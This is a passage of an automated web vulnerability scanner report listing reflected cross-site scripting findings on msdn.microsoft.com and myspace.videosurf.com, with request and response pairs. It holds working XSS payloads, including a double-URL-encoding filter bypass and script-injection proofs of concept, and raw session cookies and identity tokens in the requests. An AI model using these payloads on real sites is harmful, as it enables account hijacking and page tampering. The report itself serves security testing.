2.128. http://msdn.microsoft.com/en-us/library/ms691105(VS.85).aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms691105(VS.85).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 676ce%2522%253e%253ca%253e1ab5e936dbc was submitted in the REST URL parameter 3. This input was echoed as 676ce"><a>1ab5e936dbc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ms691105(VS.85).aspx676ce%2522%253e%253ca%253e1ab5e936dbc HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9223
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms691105(VS.85).aspx676ce"><a>1ab5e936dbc" />
...[SNIP]...

2.129. http://msdn.microsoft.com/en-us/library/ms951681.aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms951681.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 389b8%2522%253e%253ca%253e0c832b23844 was submitted in the REST URL parameter 1. This input was echoed as 389b8"><a>0c832b23844 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us389b8%2522%253e%253ca%253e0c832b23844/library/ms951681.aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.NumberOfVisits=1&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8J00021AU0002g1AU00

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:03 GMT
Content-Length: 9174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us389b8"><a>0c832b23844/library/ms951681" />
...[SNIP]...

2.130. http://msdn.microsoft.com/en-us/library/ms951681.aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms951681.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27641%2522%253e%253ca%253ec797046cb99 was submitted in the REST URL parameter 2. This input was echoed as 27641"><a>c797046cb99 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library27641%2522%253e%253ca%253ec797046cb99/ms951681.aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.NumberOfVisits=1&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8J00021AU0002g1AU00

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:58:35 GMT
Content-Length: 9174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library27641"><a>c797046cb99/ms951681" />
...[SNIP]...

2.131. http://msdn.microsoft.com/en-us/library/ms951681.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms951681.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff27%2522%253e%253ca%253e96af2b045ba was submitted in the REST URL parameter 3. This input was echoed as aff27"><a>96af2b045ba in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ms951681.aspxaff27%2522%253e%253ca%253e96af2b045ba HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.NumberOfVisits=1&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:22:51&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=1&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8J00021AU0002g1AU00

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:59:05 GMT
Content-Length: 9184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms951681.aspxaff27"><a>96af2b045ba" />
...[SNIP]...

2.132. http://msdn.microsoft.com/en-us/ms348103.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/ms348103.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f8f"><a>bfa3d2aff44 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /en-us/ms348103.aspx?b6f8f"><a>bfa3d2aff44=1 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 25589
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/ms348103.aspx?b6f8f"><a>bfa3d2aff44=1" />
...[SNIP]...

2.133. http://myspace.videosurf.com/video/brittany-mae-smith-surveillance-footage-1247969138 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/brittany-mae-smith-surveillance-footage-1247969138

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e44e4"><script>alert(1)</script>9820aeb12bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/brittany-mae-smith-surveillance-footage-1247969138e44e4"><script>alert(1)</script>9820aeb12bd HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 11 Dec 2010 18:01:02 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=5mtk9d67jhoc39d7magns8hs80; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=35; expires=Sun, 11-Dec-2011 18:01:02 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:01 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:01 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bc5e4494c; expires=Sun, 11-Dec-2011 18:01:02 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:01 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:01 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/brittany-mae-smith-surveillance-footage-1247969138e44e4"><script>alert(1)</script>9820aeb12bd"/>
...[SNIP]...

2.134. http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3100d"><script>alert(1)</script>0c1559a14fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/e-news-now-oprah-clears-up-lesbian-rumors-12473592563100d"><script>alert(1)</script>0c1559a14fa HTTP/1.1
Host: myspace.videosurf.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 11 Dec 2010 18:01:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: PHPSESSID=e61vdkp265q1860rv0jnupnb82; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=34; expires=Sun, 11-Dec-2011 18:01:11 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:10 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:10 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d03bc671d011; expires=Sun, 11-Dec-2011 18:01:11 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZR=deleted; expires=Fri, 11-Dec-2009 18:01:10 GMT; path=/; domain=.videosurf.com
Set-Cookie: ZN=deleted; expires=Fri, 11-Dec-2009 18:01:10 GMT; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml
...[SNIP]...
<meta property="og:url" content="http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-12473592563100d"><script>alert(1)</script>0c1559a14fa"/>
...[SNIP]...

2.135. http://myspace.videosurf.com/video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://myspace.videosurf.com
Path:   /video/e-news-now-oprah-clears-up-lesbian-rumors-1247359256

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2ecd"><script>alert(1)</script>f0a2b614e24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

